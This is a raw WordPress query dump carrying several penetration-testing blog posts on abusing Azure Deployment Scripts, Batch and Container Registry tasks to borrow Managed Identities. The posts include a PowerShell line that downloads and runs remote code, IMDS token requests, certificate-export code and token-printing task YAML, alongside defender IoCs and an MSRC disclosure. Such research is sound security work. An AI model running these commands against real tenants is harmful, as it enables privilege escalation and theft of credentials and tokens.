Karl Fosaaen

WP_Query Object

(

[query] => Array

(

[post_type] => Array

(

[0] => post

[1] => webinars

)

[posts_per_page] => -1

[post_status] => publish

[meta_query] => Array

(

[relation] => OR

[0] => Array

(

[key] => new_authors

[value] => "10"

[compare] => LIKE

)

[1] => Array

(

[key] => new_presenters

[value] => "10"

[compare] => LIKE

)

)

)

[query_vars] => Array

(

[post_type] => Array

(

[0] => post

[1] => webinars

)

[posts_per_page] => -1

[post_status] => publish

[meta_query] => Array

(

[relation] => OR

[0] => Array

(

[key] => new_authors

[value] => "10"

[compare] => LIKE

)

[1] => Array

(

[key] => new_presenters

[value] => "10"

[compare] => LIKE

)

)

[error] =>

[m] =>

[p] => 0

[post_parent] =>

[subpost] =>

[subpost_id] =>

[attachment] =>

[attachment_id] => 0

[name] =>

[pagename] =>

[page_id] => 0

[second] =>

[minute] =>

[hour] =>

[day] => 0

[monthnum] => 0

[year] => 0

[w] => 0

[category_name] =>

[tag] =>

[cat] =>

[tag_id] =>

[author] =>

[author_name] =>

[feed] =>

[tb] =>

[paged] => 0

[meta_key] =>

[meta_value] =>

[preview] =>

[s] =>

[sentence] =>

[title] =>

[fields] =>

[menu_order] =>

[embed] =>

[category__in] => Array

(

)

[category__not_in] => Array

(

)

[category__and] => Array

(

)

[post__in] => Array

(

)

[post__not_in] => Array

(

)

[post_name__in] => Array

(

)

[tag__in] => Array

(

)

[tag__not_in] => Array

(

)

[tag__and] => Array

(

)

[tag_slug__in] => Array

(

)

[tag_slug__and] => Array

(

)

[post_parent__in] => Array

(

)

[post_parent__not_in] => Array

(

)

[author__in] => Array

(

)

[author__not_in] => Array

(

)

[search_columns] => Array

(

)

[ignore_sticky_posts] =>

[suppress_filters] =>

[cache_results] => 1

[update_post_term_cache] => 1

[update_menu_item_cache] =>

[lazy_load_term_meta] => 1

[update_post_meta_cache] => 1

[nopaging] => 1

[comments_per_page] => 50

[no_found_rows] =>

[order] => DESC

)

[tax_query] => WP_Tax_Query Object

(

[queries] => Array

(

)

[relation] => AND

[table_aliases:protected] => Array

(

)

[queried_terms] => Array

(

)

[primary_table] => wp_posts

[primary_id_column] => ID

)

[meta_query] => WP_Meta_Query Object

(

[queries] => Array

(

[0] => Array

(

[key] => new_authors

[value] => "10"

[compare] => LIKE

)

[1] => Array

(

[key] => new_presenters

[value] => "10"

[compare] => LIKE

)

[relation] => OR

)

[relation] => OR

[meta_table] => wp_postmeta

[meta_id_column] => post_id

[primary_table] => wp_posts

[primary_id_column] => ID

[table_aliases:protected] => Array

(

[0] => wp_postmeta

)

[clauses:protected] => Array

(

[wp_postmeta] => Array

(

[key] => new_authors

[value] => "10"

[compare] => LIKE

[compare_key] => =

[alias] => wp_postmeta

[cast] => CHAR

)

[wp_postmeta-1] => Array

(

[key] => new_presenters

[value] => "10"

[compare] => LIKE

[compare_key] => =

[alias] => wp_postmeta

[cast] => CHAR

)

)

[has_or_relation:protected] => 1

)

[date_query] =>

[request] => SELECT wp_posts.ID

FROM wp_posts INNER JOIN wp_postmeta ON ( wp_posts.ID = wp_postmeta.post_id )

WHERE 1=1 AND (

( wp_postmeta.meta_key = 'new_authors' AND wp_postmeta.meta_value LIKE '{21c4be40375ce5b771a5054f5c5bdb7c0336c07ed159c2f72a21289cfda5f724}\"10\"{21c4be40375ce5b771a5054f5c5bdb7c0336c07ed159c2f72a21289cfda5f724}' )

OR

( wp_postmeta.meta_key = 'new_presenters' AND wp_postmeta.meta_value LIKE '{21c4be40375ce5b771a5054f5c5bdb7c0336c07ed159c2f72a21289cfda5f724}\"10\"{21c4be40375ce5b771a5054f5c5bdb7c0336c07ed159c2f72a21289cfda5f724}' )

) AND wp_posts.post_type IN ('post', 'webinars') AND ((wp_posts.post_status = 'publish'))

GROUP BY wp_posts.ID

ORDER BY wp_posts.post_date DESC

[posts] => Array

(

[0] => WP_Post Object

(

[ID] => 32110

[post_author] => 10

[post_date] => 2024-03-14 08:00:00

[post_date_gmt] => 2024-03-14 13:00:00

[post_content] =>



As Azure penetration testers, we often run into overly permissioned User-Assigned Managed Identities. This type of Managed Identity is a subscription level resource that can be applied to multiple other Azure resources. Once applied to another resource, it allows the resource to utilize the associated Entra ID identity to authenticate and gain access to other Azure resources. These are typically used in cases where Azure engineers want to easily share specific permissions with multiple Azure resources. An attacker, with the correct permissions in a subscription, can assign these identities to resources that they control, and can get access to the permissions of the identity.

When we attempt to escalate our permissions with an available User-Assigned Managed Identity, we can typically choose from one of the following services to attach the identity to:

- Virtual Machines

- Azure Container Registries (ACR)

- Automation Accounts

- App Services (including Function Apps)

- Azure Kubernetes Service (AKS)

- Data Factory

- Logic Apps

- Deployment Scripts

Once we attach the identity to the resource, we can then use that service to generate a token (to use with Microsoft APIs) or take actions as that identity within the service. We’ve linked out on the above list to some blogs that show how to use those services to attack Managed Identities.



The last item on that list (Deployment Scripts) is a more recent addition (2023). After taking a look at Rogier Dijkman’s post - “Project Miaow (Privilege Escalation from an ARM template)” – we started making more use of the Deployment Scripts as a method for “borrowing” User-Assigned Managed Identities. We will use this post to expand on Rogier’s blog and show a new MicroBurst function that automates this attack.

TL;DR

- Attackers may get access to a role that allows assigning a Managed Identity to a resource

- Deployment Scripts allow attackers to attach a User-Assigned Managed Identity

- The Managed Identity can be used (via Az PowerShell or AZ CLI) to take actions in the Deployment Scripts container

- Depending on the permissions of the Managed Identity, this can be used for privilege escalation

- We wrote a tool to automate this process

What are Deployment Scripts?



As an alternative to running local scripts for configuring deployed Azure resources, the Azure Deployment Scripts service allows users to run code in a containerized Azure environment. The containers themselves are created as “Container Instances” resources in the Subscription and are linked to the Deployment Script resources. There is also a supporting “*azscripts” Storage Account that gets created for the storage of the Deployment Script file resources. This service can be a convenient way to create more complex resource deployments in a subscription, while keeping everything contained in one ARM template.





In Rogier’s blog, he shows how an attacker with minimal permissions can abuse their Deployment Script permissions to attach a Managed Identity (with the Owner Role) and promote their own user to Owner. During an Azure penetration test, we don’t often need to follow that exact scenario. In many cases, we just need to get a token for the Managed Identity to temporarily use with the various Microsoft APIs.



Automating the Process



In situations where we have escalated to some level of “write” permissions in Azure, we usually want to do a review of available Managed Identities that we can use, and the roles attached to those identities. This process technically applies to both System-Assigned and User-Assigned Managed Identities, but we will be focusing on User-Assigned for this post.

Link to the Script - https://github.com/NetSPI/MicroBurst/blob/master/Az/Invoke-AzUADeploymentScript.ps1





This is a pretty simple process for User-Assigned Managed Identities. We can use the following one-liner to enumerate all of the roles applied to a User-Assigned Managed Identity in a subscription:

Get-AzUserAssignedIdentity | ForEach-Object { Get-AzRoleAssignment -ObjectId $_.PrincipalId }

Keep in mind that the Get-AzRoleAssignment call listed above will only return the role assignments that your authenticated user can read. The Invoke-AzUADeploymentScript function will attempt to enumerate all available roles assigned to the identities that you have access to, but an identity may also hold roles in other Subscriptions (or Management Groups) that you don’t have read permissions on.
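To triage the results of that one-liner offline, the sketch below filters role assignments down to a few high-value roles. It assumes the one-liner's output was piped through ConvertTo-Json first; the `HIGH_VALUE_ROLES` set, the function name, and the sample data are illustrative assumptions, not part of MicroBurst.

```python
import json

# Roles treated as "high value" here; this set is an illustrative assumption.
HIGH_VALUE_ROLES = {"Owner", "Contributor", "User Access Administrator"}


def high_value_assignments(role_json: str) -> list:
    """Return the role assignments whose role name is in HIGH_VALUE_ROLES."""
    assignments = json.loads(role_json)
    # ConvertTo-Json emits a bare object (not a list) for a single result.
    if isinstance(assignments, dict):
        assignments = [assignments]
    return [a for a in assignments if a.get("RoleDefinitionName") in HIGH_VALUE_ROLES]


# Made-up sample data shaped like Get-AzRoleAssignment output.
sample = json.dumps([
    {"ObjectId": "1111", "RoleDefinitionName": "Reader", "Scope": "/subscriptions/aaaa"},
    {"ObjectId": "2222", "RoleDefinitionName": "Owner", "Scope": "/subscriptions/aaaa"},
])

for a in high_value_assignments(sample):
    print(a["ObjectId"], a["RoleDefinitionName"], a["Scope"])
```

The same caveat applies here as to the cmdlet itself: an empty result only means that no high-value assignments were visible to the account that ran the enumeration.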





Once we have an identity to target, we can assign it to a resource (a Deployment Script) and generate tokens for the identity. Below is an overview of how we automate this process in the Invoke-AzUADeploymentScript function:

- Enumerate available User-Assigned Managed Identities and their role assignments

- Select the identity to target

- Generate the malicious Deployment Script ARM template

- Create a randomly named Deployment Script with the template

- Get the output from the Deployment Script

- Remove the Deployment Script and Resource Group Deployment
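The template-generation step in the list above can be sketched roughly as follows. This is a minimal illustration of a Deployment Script ARM template with a User-Assigned Managed Identity attached, not the template that Invoke-AzUADeploymentScript actually builds. The function name, the inline script content, the Az PowerShell version, and the retention settings are assumptions chosen for the example.

```python
import json


def build_deployment_script_template(identity_resource_id: str, script_name: str) -> dict:
    """Build an ARM template that runs a script as the given User-Assigned identity."""
    # Illustrative inline script: return a token as the deployment script output.
    # Depending on the Az module version, .Token may not be a plain string.
    script = (
        "$DeploymentScriptOutputs = @{}; "
        "$DeploymentScriptOutputs['text'] = (Get-AzAccessToken).Token"
    )
    return {
        "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
        "contentVersion": "1.0.0.0",
        "resources": [{
            "type": "Microsoft.Resources/deploymentScripts",
            "apiVersion": "2020-10-01",
            "name": script_name,
            "location": "[resourceGroup().location]",
            "kind": "AzurePowerShell",
            # The identity block is what "borrows" the Managed Identity.
            "identity": {
                "type": "UserAssigned",
                "userAssignedIdentities": {identity_resource_id: {}},
            },
            "properties": {
                "azPowerShellVersion": "8.3",
                "scriptContent": script,
                "retentionInterval": "P1D",
                "cleanupPreference": "Always",
            },
        }],
        "outputs": {
            "result": {
                "type": "string",
                "value": "[reference('%s').outputs.text]" % script_name,
            },
        },
    }


# Placeholder identity resource ID and script name, for illustration only.
example_id = (
    "/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/ExampleRG"
    "/providers/Microsoft.ManagedIdentity/userAssignedIdentities/ExampleIdentity"
)
template = build_deployment_script_template(example_id, "examplescript")
print(json.dumps(template, indent=2))
```

Deploying a template like this to a Resource Group (for example with New-AzResourceGroupDeployment) is what triggers the container creation and the write operations that show up in the activity log.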

Since we don’t have an easy way of determining if your current user can create a Deployment Script in a given Resource Group, the script assumes that you have Contributor (Write permissions) on the Resource Group containing the User-Assigned Managed Identity, and will use that Resource Group for the Deployment Script.

If you want to deploy your Deployment Script to a different Resource Group in the same Subscription, you can use the “-ResourceGroup” parameter. If you want to deploy your Deployment Script to a different Subscription in the same Tenant, use the “-DeploymentSubscriptionID” parameter and the “-ResourceGroup” parameter.

Finally, you can specify the scope of the tokens being generated by the function with the “-TokenScope” parameter.

Example Usage:

We have three different use cases for the function:

- Deploy to the Resource Group containing the target User-Assigned Managed Identity

Invoke-AzUADeploymentScript -Verbose

- Deploy to a different Resource Group in the same Subscription

Invoke-AzUADeploymentScript -Verbose -ResourceGroup "ExampleRG"

- Deploy to a Resource Group in a different Subscription in the same tenant

Invoke-AzUADeploymentScript -Verbose -ResourceGroup "OtherExampleRG" -DeploymentSubscriptionID "00000000-0000-0000-0000-000000000000"

*Where “00000000-0000-0000-0000-000000000000” is the Subscription ID that you want to deploy to, and “OtherExampleRG” is the Resource Group in that Subscription.

Additional Use Cases

Outside of the default action of generating temporary Managed Identity tokens, the function allows you to take advantage of the container environment to take actions with the Managed Identity from a (generally) trusted space. You can run specific commands as the Managed Identity using the “-Command” flag on the function. This is nice for obfuscating the source of your actions, as the usage of the Managed Identity will track back to the Deployment Script, versus using generated tokens away from the container.

Below are a couple of potential use cases and commands to use:



- Run commands on VMs

- Create RBAC Role Assignments

- Dump Key Vaults, Storage Account Keys, etc.

Since the function expects string data as the output from the Deployment Script, make sure that the command you pass to the “-Command” parameter formats its output as a string (for example, with ConvertTo-Json or Out-String), so that the command output is returned.

Example:

Invoke-AzUADeploymentScript -Verbose -Command "Get-AzResource | ConvertTo-Json"

Lastly, if you’re running any particularly complex commands, then you may be better off loading in your PowerShell code from an external source as your “-Command” parameter. Using the Invoke-Expression (IEX) cmdlet in PowerShell is a handy way to do this.

Example:

IEX(New-Object System.Net.WebClient).DownloadString('https://example.com/DeploymentExec.ps1') | Out-String



Indicators of Compromise (IoCs)

We’ve included the primary IoCs that defenders can use to identify these attacks. These are listed in the expected chronological order for the attack.

| Operation Name | Description |

|---|---|

| Microsoft.Resources/deployments/validate/action | Validate Deployment |

| Microsoft.Resources/deployments/write | Create Deployment |

| Microsoft.Resources/deploymentScripts/write | Write Deployment Script |

| Microsoft.Storage/storageAccounts/write | Create/Update Storage Account |

| Microsoft.Storage/storageAccounts/listKeys/action | List Storage Account Keys |

| Microsoft.ContainerInstance/containerGroups/write | Create/Update Container Group |

| Microsoft.Resources/deploymentScripts/delete | Delete Deployment Script |

| Microsoft.Resources/deployments/delete | Delete Deployment |

It’s important to note the final “delete” items on the list, as the function does clean up after itself and should not leave behind any resources.
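For defenders who export activity log entries, a minimal sketch of checking for the sequence above might look like this. It assumes the operation names have already been extracted into a time-ordered list; the function name and the case-insensitive comparison are illustrative choices, not a tested detection rule.

```python
# Operation names from the IoC table above, in expected chronological order.
EXPECTED_SEQUENCE = [
    "Microsoft.Resources/deployments/validate/action",
    "Microsoft.Resources/deployments/write",
    "Microsoft.Resources/deploymentScripts/write",
    "Microsoft.Storage/storageAccounts/write",
    "Microsoft.Storage/storageAccounts/listKeys/action",
    "Microsoft.ContainerInstance/containerGroups/write",
    "Microsoft.Resources/deploymentScripts/delete",
    "Microsoft.Resources/deployments/delete",
]


def matches_ioc_sequence(operations: list) -> bool:
    """True if every IoC operation appears in order; other events may interleave."""
    # Compare case-insensitively, as logged operation names may differ in casing.
    seen = iter(op.lower() for op in operations)
    # Each any() call consumes the iterator up to its match, which enforces ordering.
    return all(any(op == expected.lower() for op in seen) for expected in EXPECTED_SEQUENCE)


# Made-up log excerpt: the full sequence with unrelated events mixed in.
noisy_log = ["Microsoft.Compute/virtualMachines/read"]
for name in EXPECTED_SEQUENCE:
    noisy_log += [name, "Microsoft.Authorization/roleAssignments/read"]

print(matches_ioc_sequence(noisy_log))
```

Because legitimate Deployment Script usage produces the same operations, a match is a prompt for review (who ran it, and which identity was attached) rather than proof of abuse.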

Conclusion

While Deployment Scripts and User-Assigned Managed Identities are convenient for deploying resources in Azure, administrators of an Azure subscription need to keep a close eye on the permissions granted to users and Managed Identities. A slightly over-permissioned user with access to a significantly over-permissioned Managed Identity is a recipe for a fast privilege escalation.

References:

- https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/deployment-script-template

- https://github.com/SecureHats/miaow/tree/main



We’ve recently seen an increased adoption of the Azure Batch service in customer subscriptions. As part of this, we’ve taken some time to dive into each component of the Batch service to help identify any potential areas for misconfigurations and sensitive data exposure. This research time has given us a few key areas to look at in the Azure Batch service, that we will cover in this blog.

TL;DR

- Azure Batch allows for scalable compute job execution

- Think large data sets and High Performance Computing (HPC) applications

- Attackers with Reader access to Batch can:

- Read sensitive data from job outputs

- Gain access to SAS tokens for Storage Account files attached to the jobs

- Attackers with Contributor access can:

- Run jobs on the batch pool nodes

- Generate Managed Identity tokens

- Gather Batch Access Keys for job execution persistence

The Azure Batch service functions as a middle ground between Azure Automation Accounts and a full deployment of an individual Virtual Machine to run compute jobs in Azure. This in-between space allows users of the service to spin up pools that have the necessary resource power, without the overhead of creating and managing a dedicated virtual system. This scalable service is well suited for high performance computing (HPC) applications, and easily integrates with the Storage Account service to support processing of large data sets.

While there is a bit of a learning curve for getting code to run in the Batch service, the added power and scalability of the service can help users run workloads significantly faster than some of the similar Azure services. But as with any Azure service, misconfigurations (or issues with the service itself) can unintentionally expose sensitive information.

Service Background - Pools

The Batch service relies on “Pools” of worker nodes. When the pools are created, there are multiple components you can configure that the worker nodes will inherit. Some important ones are highlighted here:

- User-Assigned Managed Identity

- Can be shared across the pool to allow workers to act as a specific Managed Identity

- Mount configuration

- Using a Storage Account Key or SAS token, you can add data storage mounts to the pool

- Application packages

- These are applications/executables that you can make available to the pool



- Certificates

- This is a feature that will be deprecated in 2024, but it could be used to make certificates available to the pool, including App Registration credentials



The last pool configuration item that we will cover is the “Start Task” configuration. The Start Task is used to set up the nodes in the pool, as they’re spun up.





The “Resource files” for the pool allow you to select blobs or containers to make available for the “Start Task”. The nice thing about the option is that it will generate the Storage Account SAS tokens for you.



While Contributor permissions are required to generate those SAS tokens, the tokens will get exposed to anyone with Reader permissions on the Batch account.

We have reported this issue to MSRC (see disclosure timeline below), as it’s an information disclosure issue, but this is considered expected application behavior. These SAS tokens are configured with Read and List permissions for the container, so an attacker with access to the SAS URL would have the ability to read all of the files in the Storage Account Container. The default window for these tokens is 7 days, so the window is slightly limited, but we have seen tokens configured with longer expiration times.
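When reviewing an exposed SAS URL, the permissions and expiration are readable directly from its query string. The sketch below parses the standard `sp` (permissions) and `se` (expiry) parameters. The storage account name, container, and signature are made-up placeholders, and the expiry parsing assumes the full `YYYY-MM-DDTHH:MM:SSZ` form, which may not cover every token.

```python
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlsplit


def describe_sas_url(url: str) -> dict:
    """Summarize what a SAS URL grants and when it expires."""
    parts = urlsplit(url)
    query = parse_qs(parts.query)  # also decodes %3A and similar escapes
    permissions = query.get("sp", [""])[0]
    expiry_raw = query.get("se", [""])[0]
    expires = None
    if expiry_raw:
        # Assumes the second-resolution UTC format.
        expires = datetime.strptime(expiry_raw, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {
        "host": parts.netloc,
        "path": parts.path,
        "can_read": "r" in permissions,
        "can_list": "l" in permissions,
        "expires": expires,
    }


# Placeholder URL, not a real token.
example_url = (
    "https://examplestorage.blob.core.windows.net/batchfiles"
    "?sv=2021-08-06&se=2024-03-21T08%3A00%3A00Z&sr=c&sp=rl&sig=REDACTED"
)
info = describe_sas_url(example_url)
print(info["path"], info["can_read"], info["can_list"], info["expires"])
```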



The last item that we will cover for the pool start task is the “Environment settings”. It’s not uncommon for us to see sensitive information passed into cloud services (regardless of the provider) via environmental variables. Your mileage may vary with each Batch account that you look at, but we’ve had good luck with finding sensitive information in these variables.
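A quick way to triage environment settings is to flag suspicious names and values. The sketch below assumes the settings have been collected as name/value pairs; the regular expressions and the sample data are illustrative assumptions, and will both miss secrets and produce false positives.

```python
import re

# Illustrative patterns only; tune them for the environment being reviewed.
SUSPECT_NAME = re.compile(r"pass|secret|key|token|connection", re.IGNORECASE)
SUSPECT_VALUE = re.compile(r"AccountKey=|[?&]sig=", re.IGNORECASE)


def flag_sensitive_settings(settings: list) -> list:
    """Return the names of settings whose name or value looks sensitive."""
    flagged = []
    for setting in settings:
        name = setting.get("name", "")
        value = setting.get("value") or ""
        if SUSPECT_NAME.search(name) or SUSPECT_VALUE.search(value):
            flagged.append(name)
    return flagged


# Made-up settings for illustration.
sample_settings = [
    {"name": "LOG_LEVEL", "value": "info"},
    {"name": "DB_PASSWORD", "value": "example-only"},
    {"name": "DATA_SOURCE", "value": "https://examplestorage.blob.core.windows.net/c?sp=rl&sig=REDACTED"},
]
print(flag_sensitive_settings(sample_settings))
```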

Service Background - Jobs

Once a pool has been configured, it can have jobs assigned to it. Each job has tasks that can be assigned to it. From a practical perspective, you can think of tasks as the same as the pool start tasks. They share many of the same configuration settings, but they just define the task level execution, versus the pool level. There are differences in how each one is functionally used, but from a security perspective, we’re looking at the same configuration items (Resource Files, Environment Settings, etc.).



Generating Managed Identity Tokens from Batch

With Contributor rights on the Batch service, we can create new (or modify existing) pools, jobs, and tasks. By modifying existing configurations, we can make use of the already assigned Managed Identities.

If there’s a User-Assigned Managed Identity that you’d like to generate tokens for, that isn’t already used in Batch, your best bet is to create a new pool. Keep in mind that pool creation can be a little difficult: when we started investigating the service, we had to request a pool quota increase just to start using the service.



To generate Managed Identity Tokens with the Jobs functionality, we will need to create new tasks to run under a job. Jobs need to be in an “Active” state to add a new task to an existing job. Jobs that have already completed won’t let you add new tasks.



In any case, you will need to make a call to the IMDS service, much like you would for a typical Virtual Machine, or a VM Scale Set Node.

(Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing).Content
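For Linux nodes, or anywhere Python is more convenient than PowerShell, the same IMDS request can be sketched as below. The block only constructs the request and does not send it; the function name and the placeholder client ID are assumptions. The optional `client_id` query parameter is how IMDS selects a specific User-Assigned Managed Identity when more than one is attached.

```python
from typing import Optional
from urllib.parse import urlencode
from urllib.request import Request

IMDS_TOKEN_ENDPOINT = "http://169.254.169.254/metadata/identity/oauth2/token"


def build_imds_request(resource: str, client_id: Optional[str] = None) -> Request:
    """Build (but do not send) an IMDS token request for the given resource."""
    params = {"api-version": "2018-02-01", "resource": resource}
    if client_id:
        # Select a specific User-Assigned Managed Identity.
        params["client_id"] = client_id
    # IMDS rejects requests that lack the Metadata: true header.
    return Request(f"{IMDS_TOKEN_ENDPOINT}?{urlencode(params)}", headers={"Metadata": "true"})


req = build_imds_request("https://management.azure.com/")
print(req.full_url)
```

On a node, passing the request to `urllib.request.urlopen(req)` and reading the response would return the JSON document that contains the access token.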

To make Managed Identity token generation easier, we’ve included some helpful shortcuts in the MicroBurst repository - https://github.com/NetSPI/MicroBurst/tree/master/Misc/Shortcuts

If you’re new to escalating with Managed Identities in Azure, here are a few posts that will be helpful:

- Azure Privilege Escalation Using Managed Identities - NetSPI

- Mistaken Identity: Extracting Managed Identity Credentials from Azure Function Apps - NetSPI

- Managed Identity Attack Paths, Part 1: Automation Accounts – Andy Robbins, SpecterOps



Alternatively, you may also be able to directly access the nodes in the pool via RDP or SSH. This can be done by navigating the Batch resource menus into the individual nodes (Batch Account -> Pools -> Nodes -> Name of the Node -> Connect). From here, you can generate credentials for a local user account on the node (or use an existing user) and connect to the node via SSH or RDP.

Once you’ve authenticated to the node, you will have full access to generate tokens and access files on the host.







Exporting Certificates from Batch Nodes

While this part of the service is being deprecated (February 29, 2024), we thought it would be good to highlight how an attacker might be able to extract certificates from existing node pools. It’s unclear how long those certificates will stick around after they’ve been deprecated, so your mileage may vary.



If there are certificates configured for the Pool, you can review them in the pool settings.

Once you have the certificate locations identified (either CurrentUser or LocalMachine), appropriately modify and use the following commands to export the certificates to Base64 data. You can run these commands via tasks, or by directly accessing the nodes.

$mypwd = ConvertTo-SecureString -String "TotallyNotaHardcodedPassword..." -Force -AsPlainText

Get-ChildItem -Path cert:\currentUser\my\| ForEach-Object{

try{ Export-PfxCertificate -cert $_.PSPath -FilePath (-join($_.PSChildName,'.pfx')) -Password $mypwd | Out-Null

[Convert]::ToBase64String([IO.File]::ReadAllBytes((-join($PWD,'\',$_.PSChildName,'.pfx'))))

remove-item (-join($PWD,'\',$_.PSChildName,'.pfx'))

}

catch{}

}



Once you have the Base64 versions of the certificates, set the $b64 variable to the certificate data and use the following PowerShell code to write the file to disk.

$b64 = "MII…[Your Base64 Certificate Data]"

[IO.File]::WriteAllBytes("$PWD\testCertificate.pfx",[Convert]::FromBase64String($b64))

Note that the PFX certificate uses "TotallyNotaHardcodedPassword..." as a password. You can change the password in the first line of the extraction code.

Automating Information Gathering

Since we are most commonly assessing an Azure environment with the Reader role, we wanted to automate the collection of a few key Batch account configuration items. To support this, we created the “Get-AzBatchAccountData” function in MicroBurst.

The function collects the following information:

- Pools Data

- Environment Variables

- Start Task Commands

- Available Storage Container URLs

- Jobs Data

- Environment Variables

- Tasks (Job Preparation, Job Manager, and Job Release)

- Jobs Sub-Tasks

- Available Storage Container URLs

- With Contributor Level Access

- Primary and Secondary Keys for Triggering Jobs

While I’m not a big fan of writing output to disk, this was the cleanest way to capture all of the data coming out of available Batch accounts.

Tool Usage:



Authenticate to the Az PowerShell module (Connect-AzAccount), import the “Get-AzBatchAccountData.ps1” function from the MicroBurst Repo, and run the following command:

PS C:\> Get-AzBatchAccountData -folder BatchOutput -Verbose

VERBOSE: Logged In as kfosaaen@example.com

VERBOSE: Dumping Batch Accounts from the "Sample Subscription" Subscription

VERBOSE: 1 Batch Account(s) Enumerated

VERBOSE: Attempting to dump data from the testspi account

VERBOSE: Attempting to dump keys

VERBOSE: 1 Pool(s) Enumerated

VERBOSE: Attempting to dump pool data

VERBOSE: 13 Job(s) Enumerated

VERBOSE: Attempting to dump job data

VERBOSE: Completed dumping of the testspi account

This should create an output folder (BatchOutput) with your output files (Jobs, Keys, Pools). Depending on your permissions, you may not be able to dump the keys.

Conclusion

As part of this research, we reached out to MSRC on the exposure of the Container Read/List SAS tokens. The issue was initially submitted in June of 2023 as an information disclosure issue. Given the low priority of the issue, we followed up in October of 2023. We received the following email from MSRC on October 27th, 2023:

We determined that this behavior is considered to be 'by design'. Please find the notes below.

Analysis Notes: This behavior is as per design. Azure Batch API allows for the user to provide a set of urls to storage blobs as part of the API. Those urls can either be public storage urls, SAS urls or generated using managed identity. None of these values in the API are treated as “private”. If a user has permissions to a Batch account then they can view these values and it does not pose a security concern that requires servicing.

In general, we’re not seeing a massive adoption of Batch accounts in Azure, but we are running into them more frequently and we’re finding interesting information. This does seem to be a powerful Azure service, and (potentially) a great one to utilize for escalations in Azure environments.

References:







[post_title] => Extracting Sensitive Information from the Azure Batch Service

[post_excerpt] => The added power and scalability of Batch Service helps users run workloads significantly faster, but misconfigurations can unintentionally expose sensitive data.

[post_status] => publish

[comment_status] => closed

[ping_status] => closed

[post_password] =>

[post_name] => extracting-sensitive-information-from-azure-batch-service

[to_ping] =>

[pinged] =>

[post_modified] => 2024-02-28 10:41:26

[post_modified_gmt] => 2024-02-28 16:41:26

[post_content_filtered] =>

[post_parent] => 0

[guid] => https://www.netspi.com/?p=31943

[menu_order] => 12

[post_type] => post

[post_mime_type] =>

[comment_count] => 0

[filter] => raw

)

[2] => WP_Post Object

(

[ID] => 31693

[post_author] => 10

[post_date] => 2024-01-04 09:00:00

[post_date_gmt] => 2024-01-04 15:00:00

[post_content] =>

In the ever-evolving landscape of containerized applications, Azure Container Registry (ACR) is one of the more commonly used services in Azure for the management and deployment of container images. ACR not only serves as a secure and scalable repository for Docker images, but also offers a suite of powerful features to streamline management of the container lifecycle. One of those features is the ability to run build and configuration scripts through the "Tasks" functionality.





This functionality does have some downsides, as it can be abused by attackers to generate tokens for any Managed Identities that are attached to the ACR. In this blog post, we will show the processes used to create a malicious ACR task that can be used to export tokens for Managed Identities attached to an ACR. We will also show a new tool within MicroBurst that can automate this whole process for you.

TL;DR

- Azure Container Registries (ACRs) can have attached Managed Identities

- Attackers can create malicious tasks in the ACR that generate and export tokens for the Managed Identities

- We've created a tool in MicroBurst (Invoke-AzACRTokenGenerator) that automates this attack path

Previous Research

To be fully transparent, this blog and tooling was a result of trying to replicate some prior research from Andy Robbins (Abusing Azure Container Registry Tasks) that was well documented, but lacked copy and paste-able commands that I could use to recreate the attack. While the original blog focuses on overwriting existing tasks, we will be focusing on creating new tasks and automating the whole process with PowerShell. A big thank you to Andy for the original research, and I hope this tooling helps others replicate the attack.



Attack Process Overview

Here is the general attack flow that we will be following:

- The attacker has Contributor (Write) access on the ACR

- Technically, you could also poison existing ACR task files in a GitHub repo, but the previous research (noted above) does a great job of explaining that issue

- The attacker creates a malicious YAML task file

- The task authenticates to the Az CLI as the Managed Identity, then generates a token

- A Task is created with the AZ CLI and the YAML file

- The Task is run in the ACR Task container

- The token is written to the Task output, then retrieved by the attacker

If you want to replicate the attack using the AZ CLI, use the following steps:

- Authenticate to the AZ CLI (az login) with an account that has the Contributor role on the ACR

- Identify the available Container Registries with the following command:

az acr list

- Write the following YAML to a local file (.\taskfile)

version: v1.1.0

steps:

- cmd: az login --identity --allow-no-subscriptions

- cmd: az account get-access-token

- Note that this assumes you are using a System-Assigned Managed Identity. If you're using a User-Assigned Managed Identity, you will need to add "--username <client_id|object_id|resource_id>" to the login command

- Create the task in the ACR ($ACRName) with the following command

az acr task create --registry $ACRName --name sample_acr_task --file .\taskfile --context /dev/null --only-show-errors --assign-identity [system]

- If you're using a User-Assigned Managed Identity, replace [system] with the resource path ("/subscriptions/<subscriptionId>/resourcegroups/<myResourceGroup>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<myUserAssignedIdentity>") for the identity you want to use

- Use the following command to run the task in the ACR



az acr task run -n sample_acr_task -r $acrName

- The task output, including the token, should be displayed in the output for the run command.

- Next, we will want to delete the task with the following command

az acr task delete -n sample_acr_task -r $acrName -y

Please note that while the task may be deleted, the "Runs" of the task will still show up in the ACR. Since Managed Identity tokens have a limited shelf-life, this isn't a huge concern, but it would expose the token to anyone with the Reader role on the ACR. If you are concerned about this, feel free to modify the task definition to use another method (HTTP POST) to exfiltrate the token.
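The task file from the steps above can also be generated programmatically, which makes it easier to switch between System-Assigned and User-Assigned identities. This is a minimal sketch: the function name is hypothetical, and the "--username" handling simply follows the note in the steps above rather than anything verified against a specific AZ CLI version.

```python
from typing import Optional


def build_token_task(identity_id: Optional[str] = None) -> str:
    """Return ACR task YAML that logs in as the Managed Identity and prints a token."""
    login = "az login --identity --allow-no-subscriptions"
    if identity_id:
        # User-Assigned identity: pass its client ID, object ID, or resource ID.
        login += f" --username {identity_id}"
    return "\n".join([
        "version: v1.1.0",
        "steps:",
        f"  - cmd: {login}",
        "  - cmd: az account get-access-token",
        "",
    ])


# System-Assigned identity (default) task file content.
print(build_token_task())
```

Writing the returned string to a local file gives the same "taskfile" that the az acr task create command expects.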



Invoke-AzACRTokenGenerator Usage/overview

To automate this process, we added the Invoke-AzACRTokenGenerator function to the MicroBurst toolkit. The function follows the above methodology and uses a mix of the Az PowerShell module cmdlets and REST API calls to replace the AZ CLI commands.

A couple of things to note:

- The function will prompt (via Out-GridView) you for a Subscription to use and for the ACRs that you want to target

